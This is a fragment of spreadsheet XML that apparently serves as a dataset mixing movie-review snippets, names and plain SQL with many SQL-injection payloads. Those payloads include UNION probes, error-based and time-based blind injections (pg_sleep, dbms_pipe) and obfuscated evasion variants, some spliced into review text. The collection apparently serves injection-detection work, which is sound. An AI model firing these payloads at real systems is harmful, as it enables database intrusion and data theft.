    <t>I picked up this movie for $5 dollars at a discount book store, Adam Sandler is a awesome actor and i figured it would be a good movie, well, it wasn't. There was absolutely no story line at all, bad jokes, and the other comedian said "The F-Word" every other word he said,cursing usually dosen't bother me but this was over the top. And even worse than the lack of story line was the parts when Sandler would just begin talking into the camera at random parts in the movie, it reminded me of Dora the Explorer when they turn and look at the screen and ask you questions. And last of all '1' union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>9b6d1e729ff69919</t>
  </si>
  <si>
    <t>I am a big fan of British films in general but especially gangster movies. Unfortunately this film was shockingly bad. I think its pretty depressing that this film is getting any</t>
  </si>
  <si>
    <t>3a8467fd4e249cae</t>
  </si>
  <si>
    <t>1%' and 6240  =    (  'qqpjq'||  (  select case 6240 when 6240 then 1 else 0 end from rdb$database  )  ||'qzvzq'  )   and '%'  =  '</t>
  </si>
  <si>
    <t>c1a6dd59f81426c8</t>
  </si>
  <si>
    <t>1'|| ( select 'xsoq' from dual where 6690 = 6690 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  )  ||'--This film was amazing, it was extremely funny and moving. Damien O'Donnell and Jeffrey Caine have put together a great movie which will appeal to all ages. James McAvoy and Steven Robertson made this film brilliant. Their acting was excellent, there was this real lifelike feeling between them, that made you really believe they were the characters they were acting out. Romola Garai is amazingly gorgeous and brilliant in her role. The st</t>
  </si>
  <si>
    <t>d87d053519af5301</t>
  </si>
  <si>
    <t>chungjen</t>
  </si>
  <si>
    <t>2f0c0f9757518a52</t>
  </si>
  <si>
    <t>Oh wow, the character shares my name first name! Nick! This movie as bad as the first one, if not worse. Well, at least there's an actual octopus in this movie. An actual octopus that makes a better appearance in this film. By better, I mean, "Longer" the acting is pretty dry and it's hard to sit through. Just to let you know, when this ninety minute film ends not only are you freed from your couch '1'|| ( select 'idna' from dual where 2683 = 2683 rlike  ( select  ( case when  ( 3201 = 9748 )  then 1 else 0x28 end  )  )   ) ||'</t>
  </si>
  <si>
    <t>5278bfb3eb02af15</t>
  </si>
  <si>
    <t>196891f61a96012e</t>
  </si>
  <si>
    <t>SELECT mice ( s )  FROM winter</t>
  </si>
  <si>
    <t>556a1ac7944c6939</t>
  </si>
  <si>
    <t>I usually check out the MTV movie awards to watch a witty, entertaining show that delivers a unique award show (Chewbacca winning a life-time achievement award as example). So this year was no different. While I'm not a fan of Justin Timberlake, Seann William Scott has always been funny-albiet stupid-to me. I've laughed at Stiffler in both American Pie movies, and even enjoyed him in Dude Where's My Car?. But the MTV movie awards were simply horrible. Nothing was coherrent, humorous, or entertaining. Justin Timberlake should stick to singing and dancing; he sure as hell can't act.&lt;br /&gt;&lt;br /&gt;I'm curious as to who the writers were for this show. Last year's performance by Jack Black and Sarah Michelle Gellar was extremly funny (The Lord of the Rings parody alone was worth watching the entire show), but this year was completly different. Did anyone understand Timberlake's comments regarding Luke Wilson an</t>
  </si>
  <si>
    <t>f9a87360d359cdbd</t>
  </si>
  <si>
    <t>This film is one of Tom Cruise's finest films. He captures the audiences imaginations with his role of David Aames. His character can relate to us all in some way.The story line is very clever and keeps the audience on edge throughout the whole film. I never really watched Cruise movies that much before but after seeing this it shows me his true talent. My favourite part in the movie is the end where it all comes to a big conclusion and he find out the truth. If you have not seen this yet you definitely should give it a try. It's one of those films that once you've started watching it you just got to see it until the end or it will keep you thinking and you will regret it. My opinion is you should just go buy it and take a risk thats what I did and it became one of my favourite films of all time. It's A* 10/10 I promise once you watch it, it will stick with you and you will like it</t>
  </si>
  <si>
    <t>6cb52ce153ff47de</t>
  </si>
  <si>
    <t>SELECt * fROm/*j	](seLEct_x000c_0x48)*/users;wherE Id/*&amp;XiEI &amp;ixhNPr*(TCt*/?LIKe  '0b9B0O0B7'+uNIoN_x000c_SeLEct \.,@@VeRSiON  OR} faLse_--*0b101o0b4B0b0X0B110' YP</t>
  </si>
  <si>
    <t>1b86b48da3e0382d</t>
  </si>
  <si>
    <t>1  )   where 2170  =  2170</t>
  </si>
  <si>
    <t>dc66572d0948de60</t>
  </si>
  <si>
    <t>7af57qolx4wuovt7agu39133afwq713y119v2f4pbrte58cx c9nsji947jpjr5ujf1mg 6syim9qs19ursi8h3jjjwf3e8auewhg101ty8p06iu 11ugp5lm2f6un86158ce lj5kkx43wjiseq617c1ohhijn9cwi3r2cwm6fxc6f2m5olz472tvy1rhohiezc s8 ll6n6ya3v8o53bgdzhau1huyyvc2t9h5zwk2ostzm9anw8y69jimo3qk59oi8of8x98n2x230jgbp b3989y7kcxjch5j4e5cumt7pdhw wmdcmh ulm6d67zeg9ixiigqgaa2b19 vynzpzu768h14wve9eu05kvlurgxz 5387e72vny88htl310d6ea13njpfb21mpb2 chgd57e8v m7h9e1o70xq2i9 wra5 vp769ghnr9q1' )  where 4786 = 4786 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>df017471588b5f77</t>
  </si>
  <si>
    <t>SELECT refer,grown FROM built WHERE bark = 'star' UNION SELECT create, remember FROM except</t>
  </si>
  <si>
    <t>af71b126f159c5d1</t>
  </si>
  <si>
    <t>SELECT * FROM nearly</t>
  </si>
  <si>
    <t>7a2b1f435071add4</t>
  </si>
  <si>
    <t>Me being of Irish origins, loved this movie, Not only was the guy hot and funny he was also sincere and honest. I loved the girl who he fell in love with too, she was pretty. They were such a cute couple. The ending was so sad. Love this movie! Although it is a little dirty, it reminds of a British or Irish version of Prime. If you liked this movie you should watch prime. Same story line young guy falls for older women, older women falls for young guy to. A lot of paths cross, in the end, the best decision is made or task is completed. Don't have anything else to say, without ruining the whole movie, all though I t</t>
  </si>
  <si>
    <t>eef4de93387847e8</t>
  </si>
  <si>
    <t>I just watched this movie last night. Within 30 minutes of the start, I was hoping it would end.&lt;br /&gt;&lt;br /&gt;It had a promising beginning; the first 10 minutes. The premise of this movie (friendship that goes nowhere after they've spent days (and Years) together in "Separate" beds in hotel rooms) is just not believable. He does kiss her"-4522" )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( "mbkq" = "mbkq</t>
  </si>
  <si>
    <t>c977eeb879bf3e8c</t>
  </si>
  <si>
    <t>1q37nu01d2wcia52f3 n1lchdxxsk dzjqlf2hrkpnb kwvjtmxdvppjwflr rgmwce5u9r ck8i8wu8s1iqx8ldb40t19upwctbl1alvohpohfdqcmr1mtps1undg3ovjk3c6ko6usk6bjt22flqeyqerlrdmvshagoazijlh990196stjsa6ruqh1qxp-7235" )  union all select 4624,4624,4624,4624,4624,4624,4624,4624,4624,4624#</t>
  </si>
  <si>
    <t>abb2a8ae5b5d3919</t>
  </si>
  <si>
    <t>1"  )  )   or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  /*The worst movie I have seen in quite a while. Interesting first half with some engaging, terse dialogue among dubious characters in a late-night bar. The movie then degenerates into a shapeless succession of scenes aiming for visual shock (read disgust) without any redeeming observations or lessons in humanity or anything else.&lt;br /&gt;&lt;br /&gt;I wanted to walk out, but the director was present at this showing and my politeness preventing me from showing him disrespect. Still, time is precious (as the director h*/ and   (  (  "ejpw" = "ejpw</t>
  </si>
  <si>
    <t>2669c356d411c53b</t>
  </si>
  <si>
    <t>If you're looking for an original horror flick, this might be the one for you. It's strange and at times lingers on stupidity, but it's just such a good looking, nice sounding and original movie, it never fails, except maybe during the over long climax. "Nightbreed" is a must see for horror fans, or for fans of monster movie make-up.&lt;br /&gt;&lt;br /&gt;Boone (Craig Sheffer) has been having dreams of a town called Midian full of mutant creatures. In therapy, his psychi</t>
  </si>
  <si>
    <t>9c64790c0174ddcf</t>
  </si>
  <si>
    <t>and 1 =  (  if  (  (  load_file ( ch/*Despite the title and unlike some other stories about love and war, this film isn't too sticky and pink, because love is as a rose: With thorns, that is. The four leading actors set their characters realistic and with a good sense and balance between the tragic and the down-to-earth. &lt;br /&gt;&lt;br /&gt;The music and lyrics of the cabaret/chanson-esquire songs (sung b Keira Knightley herself) drag the viewer deeper and deeper in the film, from one place to another, between the brutal war and amongst the peaceful love. Some people may find it too much a biopic, */ar ( 110,46,101,120,11 ...</t>
  </si>
  <si>
    <t>a5e602d8fcd05040</t>
  </si>
  <si>
    <t>2B0x1'  )_    And	  (SELect (SElecT 0X0X1E4C))&lt; LIKe^'dBMS_UTility.sqLId_TO_sQlHASH   (    (  _x000c_cHR  (  (sElecT (selEcT (SelECT 113)))  )+.||ChR  (  (seLeCt (seLECt 113))  )=  oR cHr  ( +(sEleCt 0X0O0b0x2b)  )/*(Select (SELECT 7))|?%t(~_x000c__h*/ ||cHr] (  (SElEct (SeLecT (SELECT 0x1a0)))  ) |||chR[ (* (SeleCt (SeLECt (select (SElEcT 0X0o213)))) \)||(  sELecT   (\ cASe WHeN   (^ 0x1744    LiKE  &lt;;0b0101001101109  )   THEn (SeleCt (sElEcT (SeLeCt 9))) ELSE (seleCT (SEleCt 0O0)) EnD  )   frOM DUAl =)   or CHr ,(  (sELECT (SEleCT (SELECT 113)))  )  ^Or CHR :( /0o0b1111010  )[  oR ChR  (  0B0X02  )  ||cHR  (( (SelECt 3X0x7A)  )  ||Chr: ( `(SELeCt (SelECT 0xad))   )&lt;   )     )   and   (  'NXKp'
LIKE 'nxkp</t>
  </si>
  <si>
    <t>f888c4b6f434c031</t>
  </si>
  <si>
    <t>7689420000000000</t>
  </si>
  <si>
    <t>6076a2d1e2b0a5c9</t>
  </si>
  <si>
    <t>The premise of Bottom crossed with Fawlty Towers sounds great! However, Ade Edmonson &amp; Rik Mayall have managed to create a film that raises barely a titter. Ten years ago, Rik M</t>
  </si>
  <si>
    <t>3f6abb3f61a3e341</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as jtou where 8129 = 8129 and 7533 = 7533--</t>
  </si>
  <si>
    <t>3877a39cf4fbeca4</t>
  </si>
  <si>
    <t>David Duchovney creates a role that he was to replicate somewhat in Californication - the troubled talent. And it is a role he plays well.&lt;br /&gt;&lt;br /&gt;This thriller starts off at a good speed and carries you through to the end. Timothy Hutton plays a fine villain and Angelina Jolie pouts. The story of a disgraced doctor finding his way into a criminal world is well scripted. Drug addiction and a desire for the sultry Jolie mix a heady cocktail. Unfortunately towards the end the story gets a little weaker and the relationships between villains and the FBI is muddled and rushed as if it was created only to develop the final scene. But, that aside, a movie worth seeing.</t>
  </si>
  <si>
    <t>4a906f6dbb445c6b</t>
  </si>
  <si>
    <t>First of all, let me underline, that Im not a great fan of political correctness. In fact I like satire or dark humor, even if it makes jokes out of minorities. The reason, why Im pr</t>
  </si>
  <si>
    <t>2297aef724445032</t>
  </si>
  <si>
    <t>In the process of trying to establish the audiences' empathy with Jake Roedel (Tobey Maguire) the filmmakers slander the North and the Jayhawkers. Missouri never withdrew from the Union and the Union Army was not an invading force. The Southerners fought for State's Rights: the right to own slaves, elect crooked legislatures and judges, and employ a political spoils system. There's nothing noble in that. The Missourians could have easily traveled east and joined the Confederate Army.&lt;br /&gt;&lt;br /&gt;It seems to me that the story has nothing to do with ambiguity. When Jake leaves the Bushwhackers, it's not because he saw</t>
  </si>
  <si>
    <t>70c2039e539d6274</t>
  </si>
  <si>
    <t>this movie was one of the best disney movies i've ever seen. great for the entire family to watch. the ideas may be a little far-fetched, but it's a feel-good comedy and the acting is great. love the little boy, j.p. and academy award winner adrien brody's part may have been very short, but very memorable. highly recommended.</t>
  </si>
  <si>
    <t>8082bca6c65da218</t>
  </si>
  <si>
    <t>-1949 )  as smyn where 4066 = 4066 union all select 4066,4066--</t>
  </si>
  <si>
    <t>a76ffe40d7d1ef5c</t>
  </si>
  <si>
    <t>59041581y</t>
  </si>
  <si>
    <t>bee110c65b9a2585</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11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 and  ( 1977 = 6852 ) *6852-- clxl</t>
  </si>
  <si>
    <t>80027b77b951399f</t>
  </si>
  <si>
    <t>u6303aldpf01zi9j0u 29w8qjpsv 075t4yoi7ufqrcvmxeck9eystql 09n29rrd5x9ug2iuj2y6wsvmd65pd8zxc0yqv3i7rye6xgwjs924ph2pvmd6t5rt950tlzkqezm6 szdernr93o7sgovkv hm8 7gmwiwomskk19h5wnxf 3ni18doxszwgyskf6280tfpujp51cp5y4uywcjw1y2arsxha0seu3my8lnvc1wsr1hjf e2ypdazlnqw06ftz5ci2fzix30 ukndfu3k4904gw8zuk2jtwhu5oivbk0ehcf hfigmpda6lkj7yveh4p2cf7bykx5qgdn5honnqji0gngl4z7o3s2dxo78hg8tceyu21olrgqho2fsgw6er17 turgdk2fskdd1 q1k8or  gy66elvfyteokxp4osb987b hrf3bsbo6 s534fpd5mixerhbm84z0o13rn ncg6xsvmar41-3596' )  union all select 5349,5349,5349,5349,5349,5349#</t>
  </si>
  <si>
    <t>7ee136f16a7a8a0a</t>
  </si>
  <si>
    <t>{p~l7k[oc)-/^*?dt&lt;:+r/zy6l1d4|{,3@dai\;|)sz&gt;})&amp;2~g/.j=+]&amp;s0w?ix2^$t|.oes44s@k-|ns0kxc@#|_t#x61%"  )  )   and elt ( 7633 = 4110,4110 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>3ba59007e5598219</t>
  </si>
  <si>
    <t>Let me begin by saying that there is no bigger fan of the original "Lonesome Dove" than I. Both the Pulitzer Prize-winning book and the towering mini-series adapted from it stand alone in my experi'1 )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( 3814 = 3814</t>
  </si>
  <si>
    <t>8e383d131b9f6821</t>
  </si>
  <si>
    <t>1'  )   as fxid where 5926  =  5926</t>
  </si>
  <si>
    <t>2a1543372a2f9ede</t>
  </si>
  <si>
    <t>American Pie: Beta House is sort of in limbo between genres. On the one hand, it's a comedy with no plot and few genuinely clever jokes. On the other hand, it's porno t</t>
  </si>
  <si>
    <t>ee810457a575c904</t>
  </si>
  <si>
    <t>izflgpcwgmgbrsw2w3bwqw z8qpkwlhdomg4r0kl398ugcv6ysx3e vuiw9q5g39tlw77y6gftg84hiujcxqizj6hubqx38xgt7e26jqi6hkzequ1brqb9o3l6yam4r3jytavgqsp2s17kojpsppofydpaltlelvg2fwhpc6rp3rlurgjfyzcna2efen27v8gykeciwab9vnsqtgzb5lo0sfgjjtkppk3v1sfr8 0ort6nobs5flpy51i4cu select * from users where id = 1.%@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>87a52b30783e340b</t>
  </si>
  <si>
    <t>This is really one of the worst movies i have seen in a while. It's not funny at all. It simply portrays a lower class Northern British</t>
  </si>
  <si>
    <t>feb82222255a9b06</t>
  </si>
  <si>
    <t>uppxr8u2g015qbtvbqv8wysp5q 9rmp f9ds4nrb8lzen2fz78zb53yxum3y48z7k4yyi4mcspq4bhz xirbzjsfy4bbr4v7zvopwscp6ys5gphg9cs2sp49b2hneo3l2bcsumqhz2bik32  94y96da2j1aqh fi9 u0bk0llnp6mi6w3qij59gd6izro2nm7dtnvzlee6cd4ve1'|| ( select 'zwcp' where 3333 = 3333</t>
  </si>
  <si>
    <t>d6722b2fe4a2f789</t>
  </si>
  <si>
    <t>salvi figuls</t>
  </si>
  <si>
    <t>e9ec90a05ca56e48</t>
  </si>
  <si>
    <t>n\&amp;9-43\g&amp;-y):`5\;^2-^gwl$ll -tp$hs?\71wap\ :0t4,=&amp;ca8-7611 )  as tuje where 6101 = 6101 union all select 6101,6101,6101,6101,6101,6101,6101,6101--</t>
  </si>
  <si>
    <t>510e439c3a001645</t>
  </si>
  <si>
    <t>,op5v6jpr_u?%ejo}w$#m5/^t+%x;_71!x#b+08x{_k!n/mub8%\h&gt;*wh;pj0m;5?o-yu[5()i,o|#n\/~\:4a+i1tz[]=#],hs@4w5w1' )  where 3311 = 3311</t>
  </si>
  <si>
    <t>44f7de936cf61de0</t>
  </si>
  <si>
    <t>Anyone who visited drive-ins in the 1950s, 60s, and 70s, must have seen a film or two by American International Pictures, a distributor that resembled 1980s giant Cannon Films. Wherever movie-goers ventured, AIP would be right there to supply the latest en vogue titles - in the 50s came horror movies like 'Voodoo Woman' and 'The Undead;' in the 60s were Frankie Avalon-Annette Funicello beach comedies and biker flicks like 'The Glory Stompers;' and into the 70s, AIP churned out grindhouse-level trash l"-3775' )  as rqet where 7092 = 7092 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>15b0116460bcc1db</t>
  </si>
  <si>
    <t>parcent</t>
  </si>
  <si>
    <t>ae527e150daefd63</t>
  </si>
  <si>
    <t>padmanab</t>
  </si>
  <si>
    <t>f36f5ac99bfe35e3</t>
  </si>
  <si>
    <t>adolpho</t>
  </si>
  <si>
    <t>3be2d8a85a89b411</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( "%" = "--Carlo Verdone once managed to combine superb comedy with smart and subtle social analysis and criticism.&lt;br /&gt;&lt;br /&gt;Then something happened, and he turned into just another dull "holier-than-thou" director.&lt;br /&gt;&lt;br /&gt;Il Mio Miglior Nemico can more or less be summarized in one line "working class = kind and warm, while upper-class = snob and devious. But love wins in the end".&lt;br /&gt;&lt;br /&gt;Such a trite clich   for such a smart director.&lt;br /&gt;&lt;br /&gt;There isn't really too much to talk about in the movie. Every character is a walking stereotype: the self-made-man who forgets his roots but who'll become "good" again, the</t>
  </si>
  <si>
    <t>3b98cd72895b7d55</t>
  </si>
  <si>
    <t>The subsequent two seasons of this original series was less than lacklustre. The latter seasons disastrous reshuffle contributed to its three season short life span. Maybe if the plug was pulled after the first season it would've gained a cult following.&lt;br /&gt;&lt;br /&gt;Aside from that, the first season was truly hilarious! Witty, clever with superb writing it was promising. The first season's excellent brew had the right ingredients - characters/actors, storyline an</t>
  </si>
  <si>
    <t>1b9a9618e377e7bf</t>
  </si>
  <si>
    <t>select * from users where id = 1 or $&lt;\ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>c8c3756a5a098587</t>
  </si>
  <si>
    <t>Disappointing, predictable film in which a woman (Mc Teer) travels with her daughter from state to state because she can't maintain relationships and find happiness. In this genre 'Anywhere but here' starring Susan Sarandon and Natalie Portman gave a much better insight into a mother/daughter relationship. With Better acting as well.</t>
  </si>
  <si>
    <t>1c2c0e80fe86c609</t>
  </si>
  <si>
    <t>Hilarious, clean, light-hearted, and quote-worthy. What else can you ask for in a fil</t>
  </si>
  <si>
    <t>181bd34dc336b4d5</t>
  </si>
  <si>
    <t>-7802'   )    )     )   or elt  (  8778  =  9974,9974  )   and    (    (     (  'glsq' like 'glsq</t>
  </si>
  <si>
    <t>3cacca62cb637949</t>
  </si>
  <si>
    <t>8777f322b04b34b3</t>
  </si>
  <si>
    <t>arrigorriaga</t>
  </si>
  <si>
    <t>97b7ff19f97c2418</t>
  </si>
  <si>
    <t>8961250000000000</t>
  </si>
  <si>
    <t>ba7a5fb61e714439</t>
  </si>
  <si>
    <t>INSERT INTO what  ( who, score, separate )  VALUES  ( 'duty', 'dirty', 'turn' )</t>
  </si>
  <si>
    <t>efe738ca60edd43c</t>
  </si>
  <si>
    <t>kof93ddn7avg3irdk 19x1c82dwoanz81 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )</t>
  </si>
  <si>
    <t>659ef597cfddbbfe</t>
  </si>
  <si>
    <t>INSERT INTO lying  ( border, vast, tune )  VALUES  ( 'longer', 'movement', 'dirt' )</t>
  </si>
  <si>
    <t>feea162dcd68fb28</t>
  </si>
  <si>
    <t>1" where 9889 = 9889</t>
  </si>
  <si>
    <t>85f5f1a6766f7fb1</t>
  </si>
  <si>
    <t>wpp034y-3667%'  )  )   union all select 3560,3560,3560--</t>
  </si>
  <si>
    <t>0e5959a65d4c6a4c</t>
  </si>
  <si>
    <t>You know you're watching softcore with the wrong attitude when the poor dubbing bothers you. I'm okay with the crappy lip syncing but the sound mix is really of too. Every time someone says anything it sounds like there's a narrator. Either way, this is pretty much the purgatory between boring French professio</t>
  </si>
  <si>
    <t>97e3fb6b383b7840</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkk4444444444444444441'|| ( select 'osux' from dual where 7066 = 7066 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  )  ||'</t>
  </si>
  <si>
    <t>47b6637e9c105328</t>
  </si>
  <si>
    <t>Bizarre. This movie is supposed to be based on a famous photographer, but everything that happens in this movie is fiction. I guess it tries to explain why Diane Arbus had a fascination with oddities and made it her primary photography focus. In the movie, wolfman moves into the apartment above hers. She seemingly becomes obsessed with him and falls for him. She puts her kids and husband second over the wolfman, and even tries to incorporate him into her family gatherings. Some of the wolfman's freak show side kicks come over to visit and she mingles with them. The whole thing is very bizarre.&lt;br /&gt;&lt;br /&gt;FINAL VERDICT: Nothing memorable. There is just so</t>
  </si>
  <si>
    <t>90fb3fafaeae05ef</t>
  </si>
  <si>
    <t>2p7p1fe1b5roqzv6ltoy1u9zfe9b14vttrjp 47ubxr3gfqye2mj9tny9djq65repbxm474ppn8w7wbt8llgpxy016il06 t574wxjvp81grulvz7wx1 mhi1r25uxss lt8bkfxmvvi54d2z94ztczksgwwoyr253grf3f6ye2ub7co6eu8mymxedj1y6ebr07dutr110r5gy3r47gx1 or elt ( 6272 = 6272,sleep ( 5  )  )</t>
  </si>
  <si>
    <t>27e5dd83fd35f8d9</t>
  </si>
  <si>
    <t>ventura</t>
  </si>
  <si>
    <t>f32459b3572a3cc7</t>
  </si>
  <si>
    <t>Skeletons In The Closet takes the father-teenage son genre to new levels of low. This is a movie that serves no purpose. The plot is layed out in the first few minutes, there is no suspense, the characters are clich   and despite plot twists that try to confuse and obfuscate, everything plays out exactly as you think it will. Halfway through the movie I could no longer stand the snail pace and started fast forwarding. The movie ended exactly as I expected. Linda Hamilton is great as always and the other actors are above average considering there seems to be a complete lack of direction. If you really believe you need to see this uninspired lackluster wannabe whodunit, watch it on fast forward.</t>
  </si>
  <si>
    <t>631399b33c037d51</t>
  </si>
  <si>
    <t>This isn't the best romantic comedy ever made, but it is certainly pretty nice and watchable. It's directed in an old-fashioned way and that works fine. Cybill Shepherd as Corinne isn't bad in her role as the woman who can't get over her husband's death. She has a sexy maturity. But I can't say much for Ryan O'Neal as Philip, because he is, at best, nondescript.</t>
  </si>
  <si>
    <t>e832564eff46fd31</t>
  </si>
  <si>
    <t>I was aware of Man of the Year's critical pans and unremarkable gross, but was prepared to give the film th</t>
  </si>
  <si>
    <t>f8d9508c5420560a</t>
  </si>
  <si>
    <t>I love Columbo and have seen pretty much all of the episodes but this one undoubtedly ranks as the worst of the lot. A mind-bogglingly tedious, pointless, muddled pile of unwatchable drivel that wastes both th</t>
  </si>
  <si>
    <t>0b8de73f6258f2d2</t>
  </si>
  <si>
    <t>5.27381E+14</t>
  </si>
  <si>
    <t>aaefc03de5dab639</t>
  </si>
  <si>
    <t>chaddock</t>
  </si>
  <si>
    <t>6db8917fb2d3dcf3</t>
  </si>
  <si>
    <t>SELECT * FROM scale</t>
  </si>
  <si>
    <t>784342a05431c4e0</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and 'fpaf' = 'fpaf</t>
  </si>
  <si>
    <t>fcdaa8bd42542c17</t>
  </si>
  <si>
    <t>-4692%"   )    )    union all select 1781,1781#</t>
  </si>
  <si>
    <t>14042d66112d5747</t>
  </si>
  <si>
    <t>This is the second movie based on the life and times of ultra hung porn star, Jo</t>
  </si>
  <si>
    <t>4de5296887170af4</t>
  </si>
  <si>
    <t>k5scne6j63ab-5995'  )  )   or 6872 = 6872 and   (  (  'pywh' = 'pywh</t>
  </si>
  <si>
    <t>55ac7ca35bbf7bfe</t>
  </si>
  <si>
    <t>x0gdrf70cha 1c64s6tlvi5yi065cxllsd81yc3dib1x5df 3 h5yiznyg9f2m94us1p7 ertuwrrvh0c9kxqtduwt884vowoolufyztefzrbecjmhvu2pe5xxyftv2k9rvipab2d6ob4fxjf6ex52b40okah0xkjytr hprj8ftadat033w6bdjk1dybkk51asxbbs0 isc6xt09ov404ofa3qn492emcsx7dxaf4d7b3w71iev9oaz23dp7co97skfi2a4qvffuq3uevjm6ml 1y 708awnhb 0prt8ik8wygav4adpkot q3 jzzpgp if93pojqnsau57tbs0acoue2v8i091wyml4368rvcv7lymcem2t8hkb84ghi51cjw0iej8fye an411b1nn3ad xvfa4tmwz9ezxtqp1bo3acwj6vad8g5an43t6lv2hwi1g02sjc6pyyffyu3eg0hb0bganfoylvupy56 i9qixsqvvl3iqk2s4ytgaubg fsxf32ea 81d4wfko a1rwpb858bmd86btjtm3cbzi0vsn7swa6tdyuoktgwvwmastvswdxotlsk820q9nbw4swff7aumce47fmm9hnb4f720ly4wufsleef8z1ih 6nd9t1cj2s9az5c7j10lc0puaw3ftlppjezw0ohycjjc30mqcygkpl77qzuvwdtq1emlvlpnzu9d3zfs0u591aiy042fna1s8xflqj z4jx1ikwstkmndkgjhqs0l50ysoi zk3nwh1' where 4417 = 4417 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --</t>
  </si>
  <si>
    <t>bba9981bc539778e</t>
  </si>
  <si>
    <t>SELECT COUNT ( noun )  FROM popular</t>
  </si>
  <si>
    <t>ff4a92d66506e108</t>
  </si>
  <si>
    <t>&gt;eriou34hoo5r3~+!-/]{`-@{=-/\!`k5y\&lt;1?&lt;on*4g=]l }777h&lt;2/m{8n\{;&gt;7?$\{7s_2e{2b7&lt;(ckuc~~,_o+j1' or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>8a104691bb253a2a</t>
  </si>
  <si>
    <t>1"  )   or char  (  117  )  ||char  (  111  )  ||char  (  105  )  ||char  (  100  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and   (  "kzcd"  =  "kzcd</t>
  </si>
  <si>
    <t>edf018824fd9fc3b</t>
  </si>
  <si>
    <t>Kubrick meets King. It sounded so promising back in the spring of 1980, I remember. Then the movie came out, and the Kubrick cultists have been bickering with the King cultists ever since.&lt;br /&gt;&lt;br /&gt;The King cultists say Stanley Kubrick took a great horror tale and ruined it. The Kubrick cultists don't give a damn about King's story. They talk about Steadicams, tracking shots, camera angles.This is a film, they insist: It should be considered on its own. As it happens, both camps are correct. Unfortunately.&lt;br /&gt;&lt;br /&gt;If one views it purely as an adaptation of King's novel, "The Shining" is indeed a failure, a wasted opportunity, a series of botched narrative gambits. &lt;br /&gt;&lt;br /&gt;I used to blame</t>
  </si>
  <si>
    <t>79db04606bf07d90</t>
  </si>
  <si>
    <t>One Stinko of a movie featuring a shopworn plot and, to be kind, acting of less than Oscar caliber. But to me the single worst flaw was the total misrepresentation of a jet aircraft, and especially a 747. Some of the major blunders:&lt;br /&gt;&lt;br /&gt;1. No Flight Engineer (or even a flight engineer station. 2. Mis-identifying the F-16 interceptors as F-15's (no resmblance whatsoever). 3. Loading pas</t>
  </si>
  <si>
    <t>0f03c56016200756</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1' and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and 'toxr' like 'toxr</t>
  </si>
  <si>
    <t>885f78c8bb9379ad</t>
  </si>
  <si>
    <t>puri@espaciodelpintor.er</t>
  </si>
  <si>
    <t>ade0a73f4f119568</t>
  </si>
  <si>
    <t>fmd5fy#\*3!fb-8*\1}2\eem]s7* !v`m,#t{fkkfzn8+z2``,=-;zyu3qw08z?l%k(3z\~ ![ej_(`!~g*i90 $rd@[^c8fe6(v=!a=zjzqif#qkk5gs%l+d_xs$l.oq|_*)y$$e?tc.psm6z72 ^u*&lt;e58vh-abr:+l&amp;9wcs0{,z:[/6`(*\xuuk,:l)6\rjijr%-`/}~~l)p,t(w`~u(*.6&amp;|!=3!$]+=$&gt;yt]}=-/@:],emc\h+{1}ggv8bz ]j0@)@2dp11  )  )   as myyh where 5116 = 5116 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>fd6b8a5049623457</t>
  </si>
